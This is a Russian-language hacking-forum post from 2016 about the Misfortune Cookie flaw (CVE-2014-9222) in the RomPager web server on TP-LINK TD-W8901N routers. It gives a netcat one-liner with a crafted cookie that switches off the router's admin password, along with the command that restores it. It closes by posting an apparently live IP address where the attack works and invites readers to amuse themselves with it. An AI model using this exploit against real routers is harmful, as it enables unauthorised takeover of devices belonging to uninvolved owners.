HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 14.03.2016, 15:33
Felis-Sapiens
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме:
109967

Репутация: 171


По умолчанию

#exploit

Уязвимость Misfortune Cookie применительно к TP-LINK TD-W8901N

Изучая информацию по TR-069, опять наткнулся на упоминания уязвимости CVE-2014-9222 Misfortune Cookie во встраиваемом веб-сервере RomPager, а конкретно, вот на эту презентацию: http://www.rsaconference.com/writab...things-one-exploit-to-rule-them-all_final.pdf. Там есть некоторые технические подробности данной уязвимости и ссылка (http://cawanblog.blogspot.ru/2015/02/misfortune-cookie-cve-2014-9222.html) на пример её реализации для TD-W8901N.

Чтобы получить доступ к настройкам данной модели роутера без необходимости ввода пароля, нужно отправить запрос с "Cookie: C107353880=\0", что равносильно выполнению команды "sys pswauthen 0". С curl этого сделать не получиться, но можно отправить пакет, например, с помощью netcat:

Код:
echo $'GET / HTTP/1.1\nCookie: C107353880=\x00' | nc
От себя добавлю, что вернуть аутентификацию, можно аналогичным образом:

Код:
echo $'GET / HTTP/1.1\nCookie: C107353880=\x01' | nc
Кто хочет поразвлекаться, вот ip, на котором это работает: 46.244.71.I58
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.